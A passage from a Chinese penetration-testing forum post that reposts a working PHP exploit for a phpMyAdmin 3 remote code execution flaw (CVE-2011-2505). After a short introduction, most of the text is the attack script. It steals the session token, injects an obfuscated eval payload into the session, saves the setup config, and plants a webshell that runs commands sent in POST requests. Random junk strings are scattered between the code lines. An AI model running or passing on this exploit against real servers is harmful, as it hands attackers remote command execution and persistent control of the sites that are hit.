中国网络渗透测试联盟
标题:
phpadmin3 remote code execute php版本exploit
[打印本页]
作者:
admin
时间:
2013-2-21 09:13
标题:
phpadmin3 remote code execute php版本exploit
最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。
8 Q8 R+ C. B# l0 T" ^0 ]0 |
* r% p% ]8 q4 w) y6 D
昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了翻,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。
! l6 q# u2 w+ M3 V! x' P' o# Z2 v
4 e) `* ?2 d% M, i! G, p
首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:
) b6 c: B) r! F7 A! L. p) Z
一是session.auto_start = 1;
" \! }& w# n0 @! v, r) q0 ?
二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。
3 E' z! L5 {: A+ x$ u2 B' R k" j
当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。
) a% Z( d7 S; m/ O) z3 a' Y: B
( U7 X% f. r: ^: ^( P$ q2 S! I
在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。
9 _4 J0 O- w7 y
2 f; t( ^) q* e2 J
于是写了这个php版本的exp,代码如下:
; Q6 m7 Q( \6 D% B* y% B5 d
1 L. m5 k# o1 F3 J& e+ i- C
#!/usr/bin/php
j; Q" f2 @( L
<?php
, Z% h! s2 ]% ]3 w* s
print_r('
: Y: b' ]+ {5 ?1 _5 Q( s
+---------------------------------------------------------------------------+
; p) ~7 t( {! i
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
: w9 ^% W6 J* ?8 y; h
by oldjun(
www.oldjun.com
)
) U$ y2 i9 \, ~3 B
welcome to
www.t00ls.net
: _) _' X& C5 d+ ^! _$ X2 u
mail:
oldjun@gmail.com
+ ?: N( ~4 P0 ], b
Assigned CVE id: CVE-2011-2505
* o4 G3 l; [7 G" C& f6 v1 j
+---------------------------------------------------------------------------+
" E9 C) ?% f" p# _ Y; R) y" r/ a; ]& {
');
9 ~* M; V$ @5 V$ f
- S$ H: G+ u5 X' [) J) K. G8 Y: f
/**
4 S9 G" _. a9 \5 }+ ~7 d) M7 @
* working when the directory:"config" exists and is writeable.
3 D# [+ [2 }0 t" j& s
**/
# ]5 R$ I+ u3 Q P8 b/ N6 H4 L* h
+ K+ u4 U# Y/ \% D8 q$ P/ ? }
if ($argc < 3) {
3 X6 W; T* [3 T; v
print_r('
" L: N/ f% `2 b: r, q# s$ {
+---------------------------------------------------------------------------+
$ c! L3 w* [% K: X# c& B9 B
Usage: php '.$argv[0].' host path
, T: j8 ?, m% N1 p5 L# A
host: target server (ip/hostname)
$ V5 G6 U6 u5 t' g2 S
path: path to pma3
$ z7 o$ b# k5 V4 S D
Example:
' g4 u1 S2 P- z
php '.$argv[0].' localhost /pma/
$ ^% g- B6 \- p j. q9 y- T$ a
+---------------------------------------------------------------------------+
3 l4 a, V8 x0 ~8 @. g
');
. t$ c- W. b2 W- {5 ?1 V
exit;
& e! F& }' }1 Q1 S7 z
}
7 T; n+ W$ \9 ^* {
; T( F/ b# P" @2 B
$host = $argv[1];
1 f( A* n: @4 p3 c& o
$path = $argv[2];
0 \/ W! ^; }) ~4 ^; y3 K
* n* @& }* b6 |, i6 Q
/**
' N1 M# c8 T7 b$ ~
* Try to determine if the directory:"config" exists
. v& K0 h' Y. Z) K! [1 J
**/
- M& S0 L1 L6 ]
echo "[+] Try to determine if the directory:config exists....\n";
# q7 a7 [' l$ l/ x. |) U* E
$returnstr=php_request('config/');
! r4 m K0 N- ^7 M9 }) [8 O y
if(strpos($returnstr,'404')){
( X O, j4 I+ o1 }
exit("[-] Exploit Failed! The directory:config do not exists!\n");
( T3 y4 K, t9 G' M$ m; ]
}
( ^( D" g% ]0 V* Q
& s$ |) E: O% R: T
/**
# J& p! P% U, i6 s
* Try to get token and sessionid
; `# Z0 }/ ~" C
**/
1 ~/ K. G O& ?5 l& y$ j
echo "[+] Try to get token and sessionid....\n";
- R; n- l" _2 B, r3 {1 w
$result=php_request('index.php');
: P* G* R" s) @) `. D8 a; y
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
# ^/ @: S0 `! z1 a9 G
$token=$resp[3];
& G! o$ S0 F$ r. E- c1 j5 y
$sessionid=$resp[1];
4 \# H9 L+ Y6 S7 Y9 [* e
if($token && $sessionid){
5 T8 d- g; p1 [3 d D
echo "[+] token
token\n";
* U3 @6 l( ~! c( X
echo "[+] Session ID
sessionid\n";
7 }/ `- g& _1 a2 d% K, ?
}else{
4 t4 `0 r5 a0 T$ u' G9 _, W
exit("[-] Can't get token and Session ID,Exploit Failed!\n");
/ I. [$ c3 T% c5 }8 f! N
}
- l4 f/ y! m. m
- T1 P3 @8 W# _+ u- i
/**
: Z. s7 J J/ Y! [" |/ _2 E" W1 m
* Try to insert shell into session
6 Y" y( U6 @. y4 H8 P$ C! } g
**/
5 c0 p K( ^$ o5 G8 O
echo "[+] Try to insert shell into session....\n";
# v1 d1 N4 V; h" r
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.
) w7 I8 I) E$ d$ J7 M
- t+ T7 M2 ?+ Z4 h
/**
7 `9 r6 q% I( U! z: R2 Z" c8 B
* Try to create webshell
+ {9 c' t, }- J8 A: u% S+ Y$ L
**/
8 i+ j' j. P j1 T% K% C" |7 l h
echo "[+] Try to create webshell....\n";
- k5 \: m; P7 D& k) W! a' y0 _
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
* ?, v% ]1 l8 w! M
/**
# G' G$ ^ a' J; {! R8 F( m
* Try to check if the webshell was created successfully
: N! g- K! k7 T5 }5 f0 g2 P$ {
**/
( ?* z! m0 h z- F5 |1 }' R
echo "[+] Try to check if the webshell was created successfully....\n";
! i% d/ [: [4 |) o0 H7 v
$content=php_request('config/config.inc.php');
m5 w( d9 N: [% n4 ~
if(strpos($content,'t00ls')){
0 U6 C! J# a" w8 N5 M% ~/ P3 A
echo "[+] Congratulations! Expoilt successfully....\n";
& P9 ]9 Q7 U, h* L! { o! a
echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
- \+ o: H: d2 C5 k8 w
}else{
% r4 g ]2 U" q! |5 A
exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
# R; q2 p' n* c- i
}
8 J5 j, `8 B2 K2 p6 B- o" m1 B2 P
3 ?% _- u& p9 q5 R$ s2 R
function php_request($url,$data='',$cookie=''){
' l. ]* X- C$ i) O) C1 |) z
global $host, $path;
9 g# V7 _1 m' {' X9 @; H
: ?) o6 }( J( @6 o/ u
$method=$data?'POST':'GET';
) |7 l1 u# c9 v$ s
( q4 I% g" `' E/ d* Y4 f# M- V
$packet = $method." ".$path.$url." HTTP/1.1\r\n";
] m! d, s% M( J2 w, Q
$packet .= "Accept: */*\r\n";
. D. ?2 D! R! B; i0 _& Z
$packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
7 e0 H( g M* ]& D) D
$packet .= "Host: $host\r\n";
: Z5 N! y$ M; d% {
$packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";
' \, @ ~1 h; ?6 I
$packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
2 E2 x% Q& r3 l# {
$packet .= $cookie?"Cookie: $cookie\r\n":"";
# o$ Y4 i& V: U C( b5 }/ U1 n
$packet .= "Connection: Close\r\n\r\n";
# g; n* {/ d% E( w/ \( q
$packet .= $data?$data:"";
3 L# Y- s, ^; k& V
6 r6 |. @/ a) Q9 \ P4 [# d8 _
$fp = fsockopen(gethostbyname($host), 80);
# w, H4 @( V( v$ I
if (!$fp) {
4 ?3 M9 b( i0 Q7 ^+ g' |( Y! N
echo 'No response from '.$host; die;
6 G- `7 ]. ?( J1 v7 R0 Q3 s
}
, w9 S" K: ^7 W! J5 C* K A
fputs($fp, $packet);
( `- |, [% E' `+ z5 t* d* K0 _8 c
% D; O+ @& s) X/ L! v) p' o8 w
$resp = '';
U \ i; A N& r
# I4 t4 q+ v2 [# H+ n* J: Q! m
while ($fp && !feof($fp))
: B' `/ Y y4 M& }$ I, v
$resp .= fread($fp, 1024);
) ?1 _7 R7 Y( C
8 R( X3 R( u& s: ]4 F
return $resp;
$ x+ m# ]; P* l3 t7 y
}
# T) M% m. l H& @: k9 J, K
' @) g7 ~1 J5 n- c! v! l) Y# P, ]
?>
* d7 ?" }& u W, i+ }4 z: C* n3 h
.
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2
token\n";sessionid\n";